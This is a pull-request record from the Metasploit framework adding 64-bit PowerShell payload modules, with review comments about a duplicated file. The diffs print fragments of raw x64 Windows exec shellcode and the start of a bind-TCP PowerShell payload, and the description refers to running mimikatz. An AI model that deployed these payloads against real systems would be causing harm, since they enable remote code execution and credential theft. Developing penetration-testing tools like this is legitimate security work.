### PR TITLE
New modules to support 64bit process powershell.

### PR DESCRIPTION
**Pull request by benpturner**
This now incorporates a 64bit version that starts a powershell process under the 64bit architecture whereas the others only start "powershell.exe *32". Things like mimikatz require a 64bit powershell process to work therefore I have extended these modules accordingly.

### CODE REVIEW

**Comment by hmoore-r7** [comment]
@benpturner Why are there two copies of this payload? Any chance these can be reduced to one? (shared mixin, etc).

**Comment by benpturner** [comment]
Do you mean to 64bit payloads, these need to use separate execute code and one is a reverse_tcp and one is a bind. Not sure I understand how these can be reduced?

**Comment by hmoore-r7** [comment]
The shellcode looks identical between windows/x64/exec.rb and windows/exec_x64.rb, if we need to update this in the future, it would be better if this was a single file. It isn't clear why there are two versions of this when the code is identical.

**Comment by benpturner** [comment]
Oh sorry, that wasn't even meant to be in there. Thanks for spotting that, I didn't see it :)

File: lib/msf/core/payload/windows/exec_x64.rb [hunk 1]
```diff
@@ -0,0 +1,67 @@
...
+            "\x01\xD6\x4D\x31\xC9\x48\x31\xC0\xAC\x41\xC1\xC9\x0D\x41\x01\xC1" +
+            "\x38\xE0\x75\xF1\x4C\x03\x4C\x24\x08\x45\x39\xD1\x75\xD8\x58\x44" +
+            "\x8B\x40\x24\x49\x01\xD0\x66\x41\x8B\x0C\x48\x44\x8B\x40\x1C\x49" +
+            "\x01\xD0\x41\x8B\x04\x88\x48\x01\xD0\x41\x58\x41\x58\x5E\x59\x5A" +
+            "\x41\x58\x41\x59\x41\x5A\x48\x83\xEC\x20\x41\x52\xFF\xE0\x58\x41" +
+            "\x59\x5A\x48\x8B\x12\xE9\x57\xFF\xFF\xFF\x5D\x48\xBA\x01\x00\x00" +
+            "\x00\x00\x00\x00\x00\x48\x8D\x8D\x01\x01\x00\x00\x41\xBA\x31\x8B" +
+            "\x6F\x87\xFF\xD5\xBB\xE0\x1D\x2A\x0A\x41\xBA\xA6\x95\xBD\x9D\xFF" +
+            "\xD5\x48\x83\xC4\x28\x3C\x06\x7C\x0A\x80\xFB\xE0\x75\x05\xBB\x47" +
+            "\x13\x72\x6F\x6A\x00\x59\x41\x89\xDA\xFF\xD5"
```
Comment (OJ) [inline lib/msf/core/payload/windows/exec_x64.rb]: Awwww.. I was hoping to see a port to Metasm in here :)

File: modules/payloads/singles/windows/x64/powershell_bind_tcp.rb [hunk 2]
```diff
@@ -0,0 +1,60 @@
...
+require 'msf/core/payload/windows/powershell'
+require 'msf/base/sessions/powershell'
+require 'msf/core/handler/bind_tcp'
+
+###
+#
+# Extends the Exec payload to add a new user.
+#
+###
+module Metasploit3
```
Comment (OJ) [inline modules/payloads/singles/windows/x64/powershell_bind_tcp.rb]: FYI in future, please use `Metasploit4` for new payloads.

**Pull request merged**